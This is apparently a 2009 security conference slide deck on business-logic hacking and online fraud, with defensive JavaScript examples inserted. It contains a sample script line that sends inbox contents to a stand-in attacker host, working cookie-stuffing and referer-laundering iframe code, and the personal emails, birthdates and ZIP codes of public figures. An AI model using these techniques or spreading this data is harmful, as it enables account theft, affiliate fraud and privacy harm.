A study conducted by the Verizon Business RISK Team: 2009 Data Breach Investigations Report

http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/
Jer-Jitsu

"The embodiment of converged IT and physical security." - InformationWeek

of Solutions Architecture
6 years as an information security consultant for Fortune 500s
PCI-DSS Curmudgeon
???
TechCrunch Layoff Tracker

[Chart: Layoff Trend, number of employees laid off per month, 1/09 through 7/09. Last update: July 3, 2009. Total employees laid off since August: 340,066]
Plan B

Hacker Stimulus Package

WhiteHat Security
© 2009 WhiteHat, Inc. | Page 6



Get Rich or Die Trying, 2008...

Four figures: Solving CAPTCHAs
Five figures: Manipulating payment systems
High five figures: Hacking banks
Six figures: Scamming eCommerce
High six figures: Defrauding affiliate networks
Seven figures: Gaming the stock market

http://www.youtube.com/watch?v=SIMF8bp5-qg

All still work just fine. :)
SHOW ME THE MONEY

The target won't know

How the breach was detected (2009 Data Breach Investigations Report, Verizon Business):

• 3rd party detection due to FRAUD (55%)
• 3rd party detection NOT due to fraud (15%)
• Employee discovery (13%)
• Unusual system performance (11%)

[Chart: breach discovery by source - Third Party 69%, Internal Active 24%, Internal Passive]
Don't be that guy

David Kernell, 20-year-old University of Tennessee student, allegedly hacked into former VP candidate Sarah Palin's Yahoo Mail.

Stephen Watt, participant in the TJX hack, which the feds call "the largest identity theft in our Nation's history," AKA Operation Get Rich or Die Tryin.

Gary McKinnon, described as the 'UFO Hacker,' allegedly broke into United States military and NASA computers to find evidence of government-suppressed information.

Attacker Targeting

Random Opportunistic
• Fully automated scripts
• Unauthenticated scans
• Targets chosen indiscriminately

Directed Opportunistic
• Commercial and open source tools
• Authenticated scans
• Multi-step processes (forms)

Fully Targeted
• Customize their own tools
• Focused on business logic
• Clever and profit driven ($$$)

[Dial graphic: Random Opportunistic - Directed Opportunistic - Fully Targeted]
Holiday Grinch-bots

eBay's "Holiday Doorbusters" promotion, administered by Strobe Promotions, was giving away 1,000 items (a 2009 Corvette, plasma TVs, jet skis, a diamond ring, etc.) to the first person to find and buy specially-marked $1 items.

[Promotion banner: HOLIDAY DOORBUSTERS, 15 days of deals, November 24 - December 8]

Some "contestants" used scripts, skipping straight to 'buy' without even viewing the goods. Almost 100% of the prizes were 'won' this way, as evidenced by the item visitor counters showing "0000".

Many were not happy and complained in the forums. Disappointed with eBay's response, some took matters into their own hands, listing "other" items for $1:

"This is picture I took of my cat with my Canon Powershot Camera after she overheard that people were using scripting to purchase HOLIDAY DOORBUSTERS items on eBay. Not responsible for poor scripting techniques."

http://redtape.msnbc.com/2008/12/ebay-users-say.html
Recover someone else's password - it's a feature!
"Appropriate" access to Email

Start with just an email address.

[Screenshot: Yahoo! password-recovery wizard, "Verify your identity" step. "Answer these questions to validate your identity. We need to verify a few questions and we'll be done." Fields: Birthday (month, day, year), Country of Residence, Postal Code. Buttons: Exit Wizard, Next]
Doing a little research

[Screenshot: Yahoo! account sign-up, step 3, "In case you forget your ID or password...": Alternate Email; Security Question (e.g. "Where did you meet your spouse?"); Your Answer]

Just a couple more details. The security questions on offer:

Where did you meet your spouse?
What was the name of your first school?
Who was your childhood hero?
What is your favorite pastime?
What is your favorite sports team?
What is your father's middle name?
What was your high school mascot?
What make was your first car or bike?
What is your pet's name?
or 'lots' of research

[Screenshot: Google search for "sarah palin" birthday. Results 1 - 10 of about 1,480,000 (0.24 seconds). Top result: Sarah Palin, Date of Birth: February 11, 1964, according to http://www.askmen.com/celebs/women/model/sarah-palin/index.html]

Account information used by the anonymous 'hacktivists':

Sarah Palin account info
gov.palin@yahoo.com
DOB 2/11/64
ZIP 99687

Todd Palin:
fek9wnr@yahoo.com
DOB 9/6/64
ZIP 99654
and you've got MAIL

[Screenshot: Mozilla Firefox showing the Yahoo! Mail inbox (84 unread) of gov.palin@yahoo.com, open on the message "Re: Looks like it's my turn in dan's crosshairs", from gov.palin@yahoo.com to "Sean personal" <sparnell@alaska.com>, Thursday, July 24, 2008, 2:14 am, quoting Sean's message of Jul 23, 2008 5:40 PM]

An excerpt from a mail between Palin and Alaska's Sean Parnell.
"The most secure email accounts on the planet"

StrongWebmail

To get into a StrongWebmail account, the account owner must receive a verification call on their phone. This means that even if your password is stolen, the thief can't access your email because they don't have access to your telephone.

[Screenshot: a StrongWebmail inbox showing the "Your StrongWebmail account has been created" message]

http://www.strongwebmail.com/

Break into my email: get $10,000. Here is my username and password.

May 21, 2009

Break into my email: get $10,000. Here is my username and password.
Username: CEO@StrongWebmail.com
Password: Mustang85

StrongWebmail.com is offering $10,000 to the first person that breaks into our CEO's StrongWebmail email account. And to make things easier, StrongWebmail is giving the username and password away!

http://www.strongwebmail.com/news/secure-web-mail/break-into-my-email-get-10000-here-is-my-username-and-password/
Lance James

http://twitpwn.com/

Application Security Specialist
http://www.asscert.com/
The easiest route

1) Registered an account and identified multiple XSS issues in a matter of minutes (Rackspace WebMail software).

2) Sent ceo@strongwebmail.com an email laced with specially crafted JavaScript malware.

3) Emailed support@strongwebmail.com stating they had won the contest and sent details to the CEO, encouraging them to check the account.

4) Within minutes the email was opened, which initiated several Ajax requests to the server, pilfering the inbox and sending the data to a remote logging script.

http://skeptikal.org/2009/06/strongwebmail-contest-won.html
http://www.fireblog.com/exclusive-interview-with-strongwebmails-10000-hacker/
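What the webmail was missing, as an added example (this is not code from StrongWebmail, Rackspace, the contest winners or the talk): a small allowlist sanitizer for HTML email bodies in JavaScript, run over a constructed "laced" message of the kind step 2 describes. The sample message, the tag/attribute allowlist and the pilferInbox() name are all assumptions for illustration.

```javascript
// Added example: a minimal allowlist sanitizer for HTML email bodies, the
// control the webmail in the contest lacked. Illustrative only, not the
// vendor's code; allowlist and sample message are assumed.

const ALLOWED_TAGS = new Set(['a', 'b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li', 'blockquote']);
const ALLOWED_ATTRS = { a: new Set(['href']) };   // no style, no on* handlers on any tag
const SAFE_SCHEMES = /^(https?:|mailto:)/i;

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Keep only allowlisted attributes. For href, reject anything that is not
// http(s)/mailto after stripping the whitespace and control characters used
// to smuggle "javascript:" past naive prefix checks.
function sanitizeAttrs(tag, raw) {
  const attrRe = /([a-zA-Z][\w-]*)\s*(?:=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let out = '', m;
  while ((m = attrRe.exec(raw)) !== null) {
    const name = m[1].toLowerCase();
    if (!ALLOWED_ATTRS[tag] || !ALLOWED_ATTRS[tag].has(name)) continue;
    const value = m[2] === undefined ? '' : m[2].replace(/^["']|["']$/g, '');
    if (name === 'href' && !SAFE_SCHEMES.test(value.replace(/[\s\u0000-\u001f]/g, ''))) continue;
    out += ` ${name}="${escapeText(value)}"`;
  }
  return out;
}

function sanitizeHtml(html) {
  // Drop script-bearing elements together with their contents first.
  html = html.replace(/<(script|style|iframe|object|embed)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, '');
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  let result = '', last = 0, m;
  while ((m = tagRe.exec(html)) !== null) {
    result += escapeText(html.slice(last, m.index));      // text between tags
    const tag = m[1].toLowerCase();
    if (ALLOWED_TAGS.has(tag)) {                           // unknown tags vanish, their text stays
      result += m[0].startsWith('</') ? `</${tag}>` : `<${tag}${sanitizeAttrs(tag, m[2])}>`;
    }
    last = tagRe.lastIndex;
  }
  return result + escapeText(html.slice(last));
}

// Quick detector for what must never reach the mail pane after sanitising.
function hasActiveContent(html) {
  return /<script|\son[a-z]+\s*=|javascript:/i.test(html);
}

// Constructed "laced" message: a script tag, an event handler and two
// javascript: links next to legitimate markup. pilferInbox() stands in for
// the Ajax code that read the inbox and posted it to a remote logger.
const LACED_EMAIL = [
  '<p>Congratulations, you <b>won</b> the contest!</p>',
  '<script>new Image().src="http://attacker.invalid/log?d="+encodeURIComponent(document.body.innerHTML)</script>',
  '<img src="x" onerror="pilferInbox()">',
  '<a href="javascript:pilferInbox()">View the details</a>',
  '<a href="  JAVA\tSCRIPT:pilferInbox()">here</a>',
  '<a href="https://example.com/details">Legit link</a>',
].join('');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(sanitizeHtml(LACED_EMAIL));
}
```

Two things the contest makes plain and the code bears out. The phone-verification step never fires, because the script runs inside the CEO's already-authenticated browser session, so a login-time control is the wrong layer for this threat. And a regex tokenizer like this one is only a sketch of the principle (allowlist tags and attributes, reject every URL scheme you did not expect, never try to blocklist); real webmail should render mail through a parser-based sanitizer and a Content-Security-Policy that forbids inline script and off-origin requests, which would also have stopped the Ajax exfiltration in step 4.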
[Logos: TeleSign Corp., Bank of America]

StrongWebmail said it was "not deterred" by the contest's quick conclusion and would be launching a new competition once this bug was fixed. "We won't rest until we have created the most secure e-mail in the world," the company said.
Twitter Hacker

Hacker Croll initiates a password recovery for a Twitter employee's Gmail account. The reset email goes to a secondary account: ******@h******.com.

Guesses the secondary Hotmail account; it is deactivated, but he is able to re-register it. Resends the reset email, and bingo.

[Logos: Gmail BETA, Windows Live Hotmail]

Pilfers the inbox for passwords to other Web services, then sets the Gmail password back to the original so the employee would not notice.

Used the same password to compromise the employee's email on Google Apps, steal hundreds of internal documents, and access Twitter's domains at GoDaddy. Sent to TechCrunch.

Owned!

Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using the same usernames/passwords and password recovery systems.

"I'm sorry" - Hacker Croll

http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/
Promo codes for cheapskates

X% and $X off sales
Free shipping
2 for 1 specials
Add-ons & upgrades

[Screenshot: sign-up form labelled "ENTER COUPON CODE DURING SIGNUP": "Fill in your data and press the 'Create' button." First Name, Last Name, currency (USD), coupon code field]
MacWorld Hacker VIP

Client-Side Hacking

Back to Back Free MacWorld Platinum Pass ($1,695)

[Photos: Macworld Conference & Expo Platinum Pass badges, San Francisco CA, and a "Platinum Pass & iPhone" pass]

http://grutztopia.jingojango.net/2007/01/your-free-macworld-expo-platinum-pass
http://grutztopia.jingojango.net/2008/01/another-free-macworld-platinum
http://grutztopia.jingojango.net/2008/02/your-client-side-s
Free Pizza Tastes Better

March 31, 2009...

1. Go to the Domino's Pizza site.
2. Order a medium one-topping pizza.
3. Enter coupon code "BAILOUT". FREE!

Still have to go pick it up!

[Screenshots: Domino's site navigation (Order, Menu, Coupons, Locations, Tracker); Consumerist headline "Domino's Accidentally Gives Away 11,000 Pizzas in Promotion"; CNET "The Cheapskate" post by Rick Broida, March 31, 2009, "Get a free one-topping pizza from Domino's": carry-out only; head to the Domino's Pizza site, click Order and type in your address to find stores near you, choose a store and create an order for a medium one-topping pizza, then use coupon code BAILOUT. "Presto: free, free, free!"]

http://consumerist.com/5193012/dominos-accidentally-gives-away-11000-pizzas-in-bailout-promot
cnet.com/8301-13845_3-10207986-58.html
Share the Knowledge

11,000 x $7.00 = $77,000

"Spoke to a Domino's rep, who told me the free-pizza code was created internally for a promotion that was never actually green-lit."
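The two coupon failures above side by side, as an added example (not code from MacWorld's registration system, Domino's, or the talk): in the MacWorld case the price was settled on the client, and in the Domino's case a code that merely existed in the system was honoured although its promotion was never approved. The coupon table, prices, dates and caps below are made up for illustration.

```javascript
// Added example (not MacWorld's, Domino's or WhiteHat's code): two promo-code
// failure modes beside a server-side check. All codes, prices, dates and
// caps are invented.

// Pattern 1 (client-side hacking): the browser computes the total and posts
// it. Whoever controls the client controls the discount.
function checkoutTrustingClient(clientOrder) {
  return { charged: clientOrder.total, code: clientOrder.code };
}

// Constructed coupon table. BAILOUT exists but was never green-lit.
const COUPONS = {
  BAILOUT:  { discount: 1.00, active: false, starts: '2009-03-30T00:00:00Z', ends: '2009-04-05T23:59:59Z', maxUses: 5000, uses: 0 },
  PLATINUM: { discount: 1.00, active: true,  starts: '2009-01-01T00:00:00Z', ends: '2009-01-31T23:59:59Z', maxUses: 200,  uses: 0 },
  SAVE10:   { discount: 0.10, active: true,  starts: '2009-01-01T00:00:00Z', ends: '2009-12-31T23:59:59Z', maxUses: Infinity, uses: 0 },
};

// Pattern 2 (dormant code): "does the code exist?" is the only check, so a
// code created for an unapproved promotion is live the moment someone types it.
function checkoutCodeExists(basePrice, code) {
  const c = COUPONS[code];
  return c ? basePrice * (1 - c.discount) : basePrice;
}

// Hardened: the client sends only the code; the server prices the order from
// its own catalogue and honours the code only when it is explicitly approved,
// inside its window and under its use cap. Every redemption is counted so a
// leaked code cannot run to 11,000 pizzas unnoticed.
function redeemCoupon(basePrice, code, now, coupons = COUPONS) {
  const c = coupons[String(code || '').trim().toUpperCase()];
  const reject = (reason) => ({ ok: false, reason, price: basePrice });
  if (!c) return reject('unknown code');
  if (!c.active) return reject('promotion not approved');
  const t = Date.parse(now);
  if (t < Date.parse(c.starts) || t > Date.parse(c.ends)) return reject('outside promotion window');
  if (c.uses >= c.maxUses) return reject('use cap reached');
  c.uses += 1;
  return { ok: true, reason: 'ok', price: Math.round(basePrice * (1 - c.discount) * 100) / 100 };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(checkoutTrustingClient({ code: 'WHATEVER', total: 0 }));   // client names its own price
  console.log(checkoutCodeExists(7.0, 'BAILOUT'));                        // dormant code gives pizza away
  console.log(redeemCoupon(7.0, 'BAILOUT', '2009-03-31T12:00:00Z'));     // rejected: not approved
  console.log(redeemCoupon(7.0, 'SAVE10', '2009-03-31T12:00:00Z'));      // accepted: 6.30
}
```

The approval flag is deliberately separate from the date window: Domino's code was inside no window at all, it simply existed, and a system that treats "exists" as "valid" has no way to keep a draft promotion from going live.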
Scams that Scale

They make money, a little or a lot.
Generally not considered hacking.
Can do them over and over again.

Cookie-Stuffing

Instead of using affiliate links the "traditional" way:

<a href="http://AffiliateNetwork/p?program=50&affiliate_id=100/">really cool product!</a>

Force affiliate requests with "Cookie Stuffing":

<iframe src="http://AffiliateNetwork/p?program=50&affiliate_id=100/" width="0" height="0"></iframe>

Remove the pesky Referer by placing the code on SSL pages:

"Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if the referring page was transferred with a secure protocol." - RFC 2616

Affiliate networks will get suspicious of all these requests with no referers.
Referer Manipulation

High-traffic site, owned by the SEO and unknown to the affiliate network. FRAME a "clean" site so the clicks carry a clean Referer:

<iframe src="http://niceseo/" width="0" height="0"></iframe>

The clean site, also owned by the SEO, serves up the cookie-stuffing code only to requests whose Referer is the black-hat website:

<iframe src="http://AffiliateNetwork/p?program=50&affiliate_id=100/" width="0" height="0"></iframe>

To the affiliate network everything looks 100% legit when investigating. They will never see the cookie-stuffing code. Mind the impression ratio!




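Network-side triage for the two stuffing patterns above, as an added example (not code from any affiliate network or from the talk). It runs over a constructed click log in which affiliate 100 stuffs cookies from a hidden iframe on an HTTPS page and affiliate 200 sends ordinary clicks from a review site; the log format, the thresholds and the affiliate IDs are all assumptions.

```javascript
// Added example (not from the talk or any affiliate network): triage of
// affiliate click logs for cookie stuffing. Log format and thresholds are
// assumptions for illustration.

// Constructed sample log: one click per line, fields ts ip key=value...
// Affiliate 100: hidden iframe on an SSL page (no Referer), three programs
// fired per visitor within the same second. Affiliate 200: normal clicks.
const SAMPLE_LOG = `
2009-07-01T10:00:01Z 203.0.113.5 affiliate_id=100 program=50 referer=-
2009-07-01T10:00:01Z 203.0.113.5 affiliate_id=100 program=51 referer=-
2009-07-01T10:00:01Z 203.0.113.5 affiliate_id=100 program=52 referer=-
2009-07-01T10:00:09Z 203.0.113.6 affiliate_id=100 program=50 referer=-
2009-07-01T10:00:09Z 203.0.113.6 affiliate_id=100 program=51 referer=-
2009-07-01T10:00:09Z 203.0.113.6 affiliate_id=100 program=52 referer=-
2009-07-01T10:02:30Z 198.51.100.7 affiliate_id=200 program=50 referer=http://reviews.example/best-widgets
2009-07-01T10:41:12Z 198.51.100.8 affiliate_id=200 program=50 referer=http://reviews.example/best-widgets
2009-07-01T11:03:55Z 198.51.100.9 affiliate_id=200 program=51 referer=-
`.trim();

function parseLine(line) {
  const [ts, ip, ...pairs] = line.trim().split(/\s+/);
  const rec = { ts, ip };
  for (const pair of pairs) {
    const i = pair.indexOf('=');                 // split at the first '=' only; URLs may contain more
    rec[pair.slice(0, i)] = pair.slice(i + 1);
  }
  return rec;
}

// Per-affiliate profile with two signals:
//  - share of clicks with no Referer (SSL page trick);
//  - share of clicks that arrived from the same visitor in the same second
//    as another click of that affiliate (a page full of hidden iframes fires
//    several programs at once; a human clicks one link).
function profileAffiliates(logText, opts = { noRefererMax: 0.5, burstMax: 0.5 }) {
  const byAffiliate = new Map();
  for (const line of logText.split('\n')) {
    if (!line.trim()) continue;
    const r = parseLine(line);
    const id = r.affiliate_id;
    if (!byAffiliate.has(id)) byAffiliate.set(id, { clicks: 0, noReferer: 0, perVisitorSecond: new Map() });
    const a = byAffiliate.get(id);
    a.clicks += 1;
    if (!r.referer || r.referer === '-') a.noReferer += 1;
    const key = `${r.ip}|${r.ts}`;
    a.perVisitorSecond.set(key, (a.perVisitorSecond.get(key) || 0) + 1);
  }
  const report = {};
  for (const [id, a] of byAffiliate) {
    let burst = 0;
    for (const n of a.perVisitorSecond.values()) if (n > 1) burst += n;
    const noRefererShare = a.noReferer / a.clicks;
    const burstShare = burst / a.clicks;
    const reasons = [];
    if (noRefererShare > opts.noRefererMax) reasons.push('mostly referer-less clicks');
    if (burstShare > opts.burstMax) reasons.push('multi-program clicks from one visitor in one second');
    report[id] = {
      clicks: a.clicks,
      noRefererShare: Math.round(noRefererShare * 100) / 100,
      burstShare: Math.round(burstShare * 100) / 100,
      suspicious: reasons.length > 0,
      reasons,
    };
  }
  return report;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(profileAffiliates(SAMPLE_LOG), null, 2));
}
```

The thresholds are ratios rather than absolute counts because a single referer-less click is normal: RFC 2616 makes every HTTPS-to-HTTP navigation arrive without a Referer. The referer-laundering trick above defeats Referer inspection, since the clicks then carry the clean site as their Referer, but it does not hide the same-visitor-same-second burst a hidden iframe produces whenever more than one program is stuffed. Browsers today also send a Sec-Fetch-Dest: iframe request header on framed navigations, which postdates the 2009 talk and is a far stronger signal where available.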
Manufacturing Links

Identify websites with a high PageRank or high traffic that offer site: search features, whose result links do not carry "nofollow", are not blocked by robots.txt, and do not redirect.

"Powered by Google", but others may work as well. Use a link farm to link to the search results pages so they get indexed:

<a href="http://www.weather.com/search/websearch?keywords=site:mysite.com+keyword&start=0&num=10&twx=on&type=web">keyword pair</a>
Google Maps vs. Spammers

[Screenshot: Google local business results for "emergency locksmith near New York, NY": a page of near-duplicate listings such as "Locksmith NYC (866) 303-3232 Emergency Locksmith 24 Hour" and "LOCKSMITH 866-992-8787 NEW YORK Emergency Service", pointing at locksmith-911.com, 24hours-locksmith.com and similar domains, each with a different toll-free number]

http://blumenthals.com/blog/2009/02/25/google-maps-vs-locksmiths-spammers-spammers-winni
http://thehollytree.blogspot.com/2008/02/scam-alert-phony-israeli-owned.html
[Screenshot: Google Local Business Center. "New! Now offering a reporting dashboard. Learn how people find your business." A map listing with "Write a review", "Get directions", "Add or edit your business". "Help customers find you on Google, it's free." Free listing: local customers already search Google for the products and services you offer; create a business listing to be sure they find you. Free updates: keep your address, phone number, hours of operation, and more up-to-date; even create coupons and display photos and videos, all for free.]
Google Earth Recon

Roofer Tom Berge used the aerial photographs of towns across the world to pinpoint museums, churches and schools across south London with lead roof tiles (darker colour).

Berge and his accomplices used ladders and abseiling ropes to strip the roofs and carried the lead ($164,980 worth) away in a stolen vehicle to be sold for scrap.

Sentenced to eight months in prison, suspended for two years, after confessing to over 30 offences.

http://www.independent.co.uk/news/uk/crime/thief-googled-163100000-lead-roofs-1645734.html
http://www.telegraph.co.uk/news/uknews/4995293/Google-Earth-used-by-thief-to-pinpoint-buildm[...]ible-lead-roofs.html
Returning other people's iPods

Nicholas Arthur Woodhams, 23, from Kalamazoo, Michigan, set up shop online to repair iPods.

Abused Apple's Advance Replacement Program by requesting replacements for guessed iPod serial numbers, each request backed with a Visa-branded gift card (only a $1 pre-authorization).

Repeated the process 9,075 times, resold the "replacements" at heavily discounted prices ($49), and denied any Apple credit charges.

Charged with trademark infringement, fraud, and money laundering.

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9130136&intsrc=news_ts_head
http://www.macworld.com/article/139522/23yearold_michigan_man_busted_for_ipod_fraud.html
http://www.appleinsider.com/articles/08/06/26/apple_makes_example_of_ipod_repairman_in_lawsuit.html
mingmoney.blogspot.com/2009/03/money-laundering-charges-for-kalamazoo.htr
Scams that scale

"Federal prosecutors have asked U.S. District Court Judge Robert Bell to let them seize real estate and personal property -- including a 2004 Audi and a 2006 drag racer -- as well as more than $571,000 in cash belonging to Woodhams, all alleged to be proceeds from his scam."
Jackpotting the iTunes Store

A group of U.K.-based DJs provided 19 songs to distributor Tunecore, who put them up for sale on iTunes and Amazon.

Once online, the DJs opened accounts with 1,500 stolen or cloned US and British credit cards to buy $825,000 worth of their albums, $10 at a time, over a couple of months.

Apple and Amazon paid roughly $300,000 in royalties, which boosted their chart rankings, resulting in even more sales and increased royalties for the DJs.

Apple received 'stop payment' orders from the credit card companies, which led to the DJs' arrest on suspicion of conspiracy to commit fraud and money laundering.

http://www.metro.co.uk/news/article.html?DJs_arrested_in_%A3200,000_iTunes_scam&in_article_id=682928&in_page_id=34
Mythical Super Hacker

Anyone can do this stuff!

Skill does not affect return on investment.

Competitors got caught because they didn't try not to.

Will Hack for $, £, ¥, €, R$, Rs

[Logos: Hotmail, e-gold and others]
Online Permit Management

In 2006, the Brazilian environment ministry did away with paper dockets and implemented an online program to issue permits documenting how much land a company could legally log, and to track the timber leaving the Amazon state of Para.

"We've pointed out before that this method of controlling the transport of timber was subject to fraud."

Andre Muggiati
Campaigner, Amazon office in Manaus
Greenpeace International
Amazonian Rainforest Hack

Allegedly 107 logging companies hired hackers to compromise the system, falsifying online records to increase the timber transport allocations. Police arrested 30 ring leaders; 202 people are facing prosecution.

As a result, an estimated 1.7 million cubic meters of illegal timber have been smuggled out of the Amazon, enough to fill 780 Olympic-sized swimming pools.

[Screenshot: Greenpeace International news item, "Hackers help destroy the Amazon rainforest", December 2008. "Brazil - High-tech smuggling": loggers may transport a certain amount of timber every year, controlled by electronic permits issued by the state government's computer system; hackers broke into the tracking system and fiddled the records]

http://www.greenpeace.org/international/news/hackers-help-destroy-the-amazo
http://www.scientificamerican.com/blog/60-second-science/post.cfm?id=hackers-help-loggers-illegally-stri-2008-12-16

$833,000,000

Same computer system is used in two other Brazilian states.
Online Permit Managers

[Screenshots of online permit systems: IN.gov permit application ("If you are ready to apply online, please have the following information ready: information about the destination, shipment carrier..."); Maine Forest Service, "Welcome to the Open Burning Permit Online Purchasing Service" ("The Maine Forest Service is pleased to offer citizens the option to purchase open burning permits online... 24 hours a day, 7 days a week, providing permits are being issued at the time. Although online burn permits can be purchased at any time and are technically valid for 48 hours after payment has been submitted, open burning can only be conducted after 5pm and before 9am, unless there is a steady rain or the ground is completely covered with snow"); the U.S. Electronic System for Travel Authorization (ESTA), offered in many languages: "International travelers who are seeking to travel to the United States under the Visa Waiver Program are now subject to enhanced security requirements. All eligible travelers who wish to travel under the Visa Waiver Program must apply for authorization using the following process"]
Hiring the Good Guys

KPMG audited 70 FAA Web applications and identified 763 high-risk vulnerabilities.

"By exploiting these vulnerabilities, the public could gain unauthorized access to information stored on Web application computers. Further, through these vulnerabilities, internal FAA users (employees, contractors, industry partners, etc.) could gain unauthorized access to ATC systems because the Web applications often act as front-end interfaces (providing front-door access) to ATC systems."

[Screenshot: CNET Security headline, "Report: Hackers broke into FAA air traffic control systems": hackers have broken into the air traffic control mission-support systems of the U.S. Federal Aviation Administration several times in recent years, according to an Inspector General report; in one incident, hackers compromised an FAA public-facing computer and used it to gain access to personally identifiable information, such as Social Security numbers, on current and former FAA employees]

[Memorandum: U.S. Department of Transportation, Office of the Secretary of Transportation, Office of Inspector General. Date: May 4, 2009. Reply to Attn of: JA-20. ACTION: Report on Review of Web Applications Security and Intrusion Detection in Air Traffic Control Systems, Report Number FI-2009-049. From: Rebecca C. Leng, Assistant Inspector General for Financial and Information Technology Audits. To: Acting Federal Aviation Administrator. "This report presents the results of our audit of Web applications security and intrusion detection in air traffic control (ATC) systems. This audit was requested by the Ranking Minority members of the House Committee on Transportation and Infrastructure and its Aviation Subcommittee."]

http://news.cnet.com/8301-1009_3-10236028-83.html
http://www.darkreading.com/security/government/showArticle.jhtml
http://www.oig.dot.gov/StreamFile?file=/data/pdfdocs/ATC_Web_Reports
Security Religions

Measure Website Security, some say...

Focus on the most important assets, test comprehensively, and get to the rest later. Defend against the Fully Targeted (Super Hacker). While others...

Recommend a minimum baseline for all assets, then test more thoroughly when resources allow. Defend against the Random Opportunists (bots and worms).

[Two charts, one per approach: the website inventory (high priority, medium priority) on the horizontal axis, testing depth (random opportunist, directed opportunist, fully targeted) on the vertical axis]

Success requires FLEXIBILITY to perform both comprehensive and scaled-out testing in accordance with the organization's tolerance for risk.
Attack Classification Misnomer

The dial is a measurement of target focus, NOT skill.

No shortage of weak websites.
Forgetting to 'not get caught'?
Learning 'super hacker' skillz?
Plenty of money still to be made.

'Plan B' Problems

Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: jeremiah@whitehatsec.com

Trey Ford
Blog: http://treyford.wordpress.com/
Twitter: http://twitter.com/treyford
Email: trey.ford@whitehatsec.com